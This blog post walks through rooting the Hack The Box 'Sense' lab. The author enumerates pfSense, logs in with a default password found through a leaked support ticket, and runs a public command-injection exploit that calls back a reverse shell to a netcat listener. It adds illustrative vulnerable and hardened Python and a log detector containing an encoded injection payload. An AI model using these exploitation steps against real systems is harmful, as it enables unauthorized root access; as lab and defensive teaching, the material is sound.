This blog is related to computer security and ethical hacking and does not promote hacking, cracking, software piracy or any kind of illegal activity. The blog is for informational and educational purposes and for those willing to learn about ethical hacking and penetration testing.
You shall not misuse the information to gain unauthorized access. Performing hack attempts (without permission) on computers that you do not own is illegal.
Hello Everyone!
Today we are going to look at the steps I followed to get root on Sense, a vulnerable machine on Hack The Box. Hack The Box is an online platform that lets you test and advance your skills in cyber security.
Scanning and Enumeration
I kicked off with an nmap scan of the target: a SYN scan with service/version detection and the default NSE scripts (-sS, -sV, -sC):
# Basic nmap scan (SYN + version detection + default scripts)
TGT=10.129.56.224
sudo nmap -sSVC $TGT
Host is up (0.087s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.129.59.115/
443/tcp open ssl/https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
The nmap results plus a manual look at the site showed pfSense served on ports 80 and 443 behind lighttpd 1.4.35 (port 80 only redirects to HTTPS, and the certificate is the stock self-signed one from 2017).
I tried the pfSense default credentials (admin/pfsense) plus a few other common combinations, but none of them worked.
To look for known vulnerabilities, I ran searchsploit against both pfSense and lighttpd (dropping the XSS entries from the pfSense list):
searchsploit pfsense | grep -v Cros
------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------- ---------------------------------
pfSense - (Authenticated) Group Member Remote Command Execut | unix/remote/43193.rb
pfSense 2.1 build 20130911-1816 - Directory Traversal | php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabilities | php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversal | php/webapps/39038.txt
pfSense 2.3.1_1 - Command Execution | php/webapps/43128.txt
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injecti | php/webapps/43560.py
pfSense Community Edition 2.2.6 - Multiple Vulnerabilities | php/webapps/39709.txt
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploit lighttpd
------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------- ---------------------------------
lighttpd - Denial of Service (PoC) | linux/dos/18295.txt
Lighttpd 1.4.15 - Multiple Code Execution / Denial of Servic | windows/remote/30322.rb
Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Exe | multiple/remote/4391.c
Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Exe | linux/remote/4437.c
lighttpd 1.4.31 - Denial of Service (PoC) | linux/dos/22902.sh
Lighttpd 1.4.x - mod_userdir Information Disclosure | linux/remote/31396.txt
lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Se | linux/dos/33591.sh
Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure | multiple/remote/8786.txt
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Web Server Enumeration
Next, I ran ffuf to brute-force directories and files on the web server, appending /, .php and .txt to every wordlist entry and replaying the hits through Burp on 127.0.0.1:8080 so I could inspect them:
wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf -w $wordlist -u https://$TGT/FUZZ -e "/,.php,.txt" --replay-proxy http://127.0.0.1:8080
The ffuf scan turned up a file named /system-users.txt. Fetching it gave the following contents:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Exploiting Pfsense Vulnerability
Combining the ticket (a user named Rohit, created with the "company defaults") with the known pfSense default password "pfsense", I logged into the web configurator with:
# Logging into the pfSense web configurator
user: rohit
password: pfsense
Once logged in, the dashboard reported the pfSense version as:
2.1.3-RELEASE (amd64)
built on Thu May 01 15:52:13 EDT 2014
FreeBSD 8.3-RELEASE-p16
With a valid login in hand I went back to the searchsploit results. The installed 2.1.3 falls under "pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection", an authenticated command injection with a public exploit: https://www.exploit-db.com/exploits/43560
head 43560.py
#!/usr/bin/env python3
# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date: 2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688
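As an added illustration (this is not pfSense's code and not the exploit script), here is the bug class behind CVE-2014-4688 in miniature: a request parameter spliced into a shell command line, next to the hardened form. The real status_rrd_graph_img.php builds an rrdtool(1) command line from request parameters; `echo` stands in for rrdtool here so the example runs anywhere, and the allowlist pattern is my assumption, not pfSense's validation.

```python
"""Illustration of OS command injection via string-built shell commands.
Not pfSense's code: `echo` stands in for the rrdtool(1) invocation that
status_rrd_graph_img.php performs."""
import re
import subprocess

# Hypothetical allowlist: the only characters a legitimate graph/database
# name could need. Anything else is rejected before a shell ever sees it.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def graph_vulnerable(database: str) -> str:
    """Interpolates the attacker-controlled value into one shell string.
    ';', '|', '&&', backticks and $() all end the intended command and
    start a new one, exactly as in 'rrdtool graph ... $database'."""
    cmd = f"echo graphing {database}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def graph_hardened(database: str) -> str:
    """Validates against the allowlist, then passes argv directly with no
    shell, so metacharacters can never be interpreted."""
    if not SAFE_NAME.fullmatch(database):
        raise ValueError(f"rejected database name: {database!r}")
    result = subprocess.run(
        ["echo", "graphing", database], capture_output=True, text=True
    )
    return result.stdout


if __name__ == "__main__":
    payload = "queues; echo INJECTED"   # constructed test value
    print(graph_vulnerable(payload), end="")   # second line is the injected command's output
    try:
        graph_hardened(payload)
    except ValueError as err:
        print(err)
```

The two functions receive the same string; only the vulnerable one produces a second line of output, because /bin/sh parses the `;` as a command separator. An authenticated-only bug like this one is still serious on an appliance whose web interface runs with full privileges.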
Exploitation and Root Access
The script logs in to the web configurator with the supplied credentials and abuses the command injection in status_rrd_graph_img.php to launch a reverse shell back to the attacker. I started a listener on port 7777 and ran the exploit (LHOST is the attacker's VPN address, and the script is written for Python 3):
# Start listener
nc -nlvp 7777
# Run exploit (LHOST = your tun0 address)
python3 /home/htb-ragab0t/43560.py --rhost $TGT --lhost $LHOST --lport 7777 --username rohit --password pfsense
The exploit gave a shell straight away as root: pfSense runs its web configurator as root, so whatever is injected into that command line runs as root too and no separate privilege escalation step was needed:
# Confirming Root Access
whoami
root
# Checking User ID
id
uid=0(root) gid=0(wheel) groups=0(wheel)
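For the defensive side, an added example (not from the original post) that scans lighttpd access-log lines for requests smuggling shell metacharacters into status_rrd_graph_img.php. The log lines are constructed for the example, the parameter name they carry is illustrative, and lighttpd's default accesslog format (`%h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"`) is assumed.

```python
"""Detect command-injection attempts against status_rrd_graph_img.php in
lighttpd access logs. Sample lines below are constructed, not real."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# lighttpd default accesslog format (assumed):
# %h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<src>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

VULN_SCRIPT = "/status_rrd_graph_img.php"
# Characters that break out of a shell command line, plus the printf/sh
# idiom used to avoid spaces and quotes in a URL.
SHELL_META = re.compile(r"[;|&`$]|\bprintf\b|\bsh\b")

# Constructed sample: one benign graph request, one injection attempt
# (database=queues;printf '\151\144'|sh once decoded), one unrelated
# request, one more benign graph request.
SAMPLE_LOG = """\
10.10.14.5 10.129.56.224 - [12/Jan/2018:10:01:02 +0000] "GET /status_rrd_graph_img.php?database=queues-hostname.rrd&style=inverse HTTP/1.1" 200 21331 "-" "Mozilla/5.0"
10.10.14.5 10.129.56.224 - [12/Jan/2018:10:01:09 +0000] "GET /status_rrd_graph_img.php?database=queues%3Bprintf+%27%5C151%5C144%27%7Csh HTTP/1.1" 200 0 "-" "python-requests/2.18.4"
10.10.14.5 10.129.56.224 - [12/Jan/2018:10:01:15 +0000] "GET /index.php HTTP/1.1" 200 6153 "-" "Mozilla/5.0"
10.10.14.5 10.129.56.224 - [12/Jan/2018:10:01:20 +0000] "GET /status_rrd_graph_img.php?database=system-processor.rrd HTTP/1.1" 200 18880 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Return the log fields as a dict, or None for lines in another format."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def injection_findings(log_text: str):
    """Return (source, timestamp, parameter, decoded value) for every request
    to the RRD graph script whose query carries shell metacharacters."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if url.path != VULN_SCRIPT:
            continue
        # parse_qsl percent-decodes once; unquote again so a double-encoded
        # value (%253B) is still inspected in its final form.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = unquote(value)
            if SHELL_META.search(decoded):
                findings.append((rec["src"], rec["ts"], name, decoded))
    return findings


if __name__ == "__main__":
    for src, ts, name, value in injection_findings(SAMPLE_LOG):
        print(f"{ts} {src} injected into {name}: {value}")
```

Only the second line is flagged; the legitimate graph requests pass because real RRD file names never need `;`, `|` or a pipe into sh. In practice, pair this with the webConfigurator login events so the alert carries the account that was used (here, a low-privilege user whose password was a company default).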
And that's it for now. Until next time :)
~Ragab0t 🤖
PS: If you're eager to dive into the art of hacking techniques, I highly recommend joining me on Hack the Box Academy through my referral link. Let's level up our skills together. See you there!